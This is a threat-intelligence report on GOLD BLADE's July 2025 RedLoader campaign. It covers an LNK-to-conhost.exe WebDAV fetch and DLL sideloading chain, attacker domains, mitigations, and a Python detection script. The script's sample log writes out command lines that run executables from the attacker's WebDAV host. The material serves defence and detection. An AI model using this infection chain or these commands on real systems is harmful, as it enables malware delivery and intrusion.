Attacks surged in July 2025 after the threat group updated its process to combine malicious LNK files and a recycled WebDAV technique
Analysis Summary
# Threat Actor: GOLD BLADE
## Attribution & Identity
* **Identification/Association:** Cybercriminal group known to utilize custom malware, specifically RedLoader. The article references external threat profile information about GOLD BLADE.
## Activity Summary
* **Recent Campaign (July 2025):** Attacks surged after the group updated its infection chain to combine malicious LNK files and a recycled WebDAV technique, leading to the deployment of RedLoader stage 1.
* **Historical Activities:**
  * September 2024: Observed using WebDAV to execute remotely hosted DLLs.
  * March 2025: Observed sideloading a renamed `ADNotificationManager.exe` file.
  * The July 2025 activity represents a novel combination of these previously observed techniques for initial execution.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Delivery via a PDF containing a malicious link, downloading a ZIP archive with a LNK file masquerading as a PDF.
- **Execution:** LNK file executes `conhost.exe`.
- **Remote Execution/Sideloading:** `conhost.exe` uses **WebDAV** to contact an attacker-controlled Cloudflare Workers domain and fetch a renamed copy of the legitimate Adobe `ADNotificationManager.exe`. That legitimate executable then **sideloads** the malicious RedLoader stage 1 DLL (`netutils.dll`) from the remote share.
- **Persistence/Staging:** RedLoader stage 1 creates a scheduled task named `BrowserQE\BrowserQE __` on the victim system.
- **Execution (Stage 2):** The scheduled task uses `PCALua.exe` and `conhost.exe` to execute RedLoader stage 2 (`BrowserQE_ __.exe`).
- **Defense Evasion:** Use of a renamed legitimate executable (`ADNotificationManager.exe`, abused as the sideloading host for the malicious DLL) and scheduled tasks for execution.
- **Detection names referenced (the source gives no explicit MITRE ATT&CK IDs):**
  * Detection `WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1` suggests monitoring for suspicious child processes of `conhost.exe`.
## Targeting
- **Sectors:** Not explicitly detailed. The initial lure is a "well-crafted cover letter PDF" delivered to the target "via a third-party job site such as 'indeed.com'," which points to phishing (or BEC-style) campaigns aimed at HR and recruiting staff at organizations that are hiring, with initial access as the goal.
- **Geography:** Not specified in the provided text.
- **Victims:** No specific organizations named, though the execution chain utilized victim-specific names for the Stage 2 executable (`BrowserQE_ __.exe`).
## Tools & Infrastructure
- **Malware Families Used:** RedLoader (Stage 1 and Stage 2 custom executables).
- **Infrastructure (C2/Hosting):**
  * Initial C2/Hosting via Cloudflare Workers: `automatinghrservices[.]workers[.]dev`
  * Remote hosted executable location (WebDAV): `dav[.]automatinghrservices[.]workers[.]dev @ SSL\DavWWWRoot\CV-APP-2012-68907872.exe`
  * Stage 2 download location: `live[.]airemoteplant[.]workers[.]dev`
## Implications
The threat actor, GOLD BLADE, demonstrates adaptability by combining previously observed infection vectors (WebDAV and DLL sideloading) into a novel, multi-stage initial execution chain. This change in technique challenges defenses whose detection patterns were built from the earlier, separate observations. Their reliance on LNK files and common system processes such as `conhost.exe` reflects an emphasis on evasion after initial delivery.
## Mitigations
- **Policy Enforcement:** Deploy a Software Restriction Policy Group Policy Object (GPO) to block LNK file execution from common malware-leveraged directories:
  * `C:\Users\*\Downloads\*.lnk`
  * `%AppDataLocal%\*.lnk`
  * `%AppDataRoaming%\*.lnk`
- **Endpoint Detection:** Deploy protections that specifically block DLL sideloading attempts involving known malicious binaries (e.g., Sophos detection `Evade_28k` which blocks specific versions of `adnotificationmanager.exe` from DLL sideloading).
- **Behavioral Monitoring:** Monitor for suspicious child processes spawned by `conhost.exe`, specifically excluding known benign processes like `\Windows\System32\WerFault.exe`.
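The behavioral monitoring above can be expressed as a small rule set over process-creation telemetry. The following is an added example (not code from the original report or from Sophos/Secureworks): it flags `conhost.exe` spawning anything other than the excluded `WerFault.exe`, flags image paths or command lines that reference a WebDAV UNC share of the `\\host@SSL\DavWWWRoot\...` form seen in this report, and flags `PCALua.exe` acting as a parent process, as in the stage 2 scheduled task. The JSON field names, the `--headless` switch in the sample command line, and the log lines themselves are constructed assumptions; the hostnames are the report's defanged IoCs, and the stage 2 file name is a placeholder because the report redacts the victim-specific name.

```python
import json
import re
from dataclasses import dataclass

# Children of conhost.exe that the report says to exclude from alerting.
# The report names only WerFault.exe, so that is the sole entry here.
BENIGN_CONHOST_CHILDREN = {r"c:\windows\system32\werfault.exe"}

# WebDAV UNC form seen in the report (\\host@SSL\DavWWWRoot\file). The @SSL and
# @port parts are optional so plain-HTTP WebDAV variants are matched as well.
WEBDAV_UNC_RE = re.compile(r"\\\\[^\\\s]+(?:@ssl)?(?:@\d+)?\\davwwwroot\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one Sysmon-style process-creation record serialised as JSON (field names assumed)."""
    rec = json.loads(line)
    return ProcessEvent(rec["ParentImage"], rec["Image"], rec.get("CommandLine", ""))


def classify(ev: ProcessEvent) -> list[str]:
    """Return the detection labels that apply to a single event (empty list = benign)."""
    findings = []
    parent = ev.parent_image.lower()
    image = ev.image.lower()
    # Rule from the report: conhost.exe spawning anything other than a known-benign child.
    if parent.endswith("\\conhost.exe") and image not in BENIGN_CONHOST_CHILDREN:
        findings.append("conhost-suspicious-child")
    # WebDAV remote-execution indicator in either the image path or the command line.
    if WEBDAV_UNC_RE.search(ev.image) or WEBDAV_UNC_RE.search(ev.command_line):
        findings.append("webdav-remote-execution")
    # The stage 2 scheduled task chains PCALua.exe and conhost.exe; flag PCALua as a parent.
    if parent.endswith("\\pcalua.exe"):
        findings.append("pcalua-proxy-execution")
    return findings


def scan(lines) -> list[tuple[int, list[str]]]:
    """Run classify() over log lines; return (line index, findings) for each line that fires."""
    hits = []
    for idx, line in enumerate(lines):
        findings = classify(parse_event(line))
        if findings:
            hits.append((idx, findings))
    return hits


# Constructed sample log, not real telemetry. Hostnames are the report's IoCs (un-defanged),
# the downloaded file name follows the report, everything else is made up for illustration.
SAMPLE_LOG = [
    # LNK launches conhost.exe, which references the WebDAV-hosted renamed executable.
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\conhost.exe", '
    r'"CommandLine": "conhost.exe --headless \\\\dav.automatinghrservices.workers.dev@SSL\\DavWWWRoot\\CV-APP-2012-68907872.exe"}',
    # conhost.exe then spawns the remotely hosted executable (the sideloading host).
    r'{"ParentImage": "C:\\Windows\\System32\\conhost.exe", '
    r'"Image": "\\\\dav.automatinghrservices.workers.dev@SSL\\DavWWWRoot\\CV-APP-2012-68907872.exe", '
    r'"CommandLine": "\\\\dav.automatinghrservices.workers.dev@SSL\\DavWWWRoot\\CV-APP-2012-68907872.exe"}',
    # Stage 2 via the scheduled task: PCALua.exe -> conhost.exe -> placeholder stage 2 binary.
    r'{"ParentImage": "C:\\Windows\\System32\\pcalua.exe", "Image": "C:\\Windows\\System32\\conhost.exe", '
    r'"CommandLine": "conhost.exe --headless C:\\Users\\Public\\STAGE2-PLACEHOLDER.exe"}',
    # Benign: conhost.exe spawning WerFault.exe, explicitly excluded by the report.
    r'{"ParentImage": "C:\\Windows\\System32\\conhost.exe", "Image": "C:\\Windows\\System32\\WerFault.exe", '
    r'"CommandLine": "WerFault.exe -u -p 1234 -s 5678"}',
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(findings)}")
```

The WerFault exclusion is deliberately an exact, lower-cased full-path match rather than a file-name match, so a `WerFault.exe` dropped into a user-writable directory would still alert; extend `BENIGN_CONHOST_CHILDREN` only with full paths you have verified in your own environment.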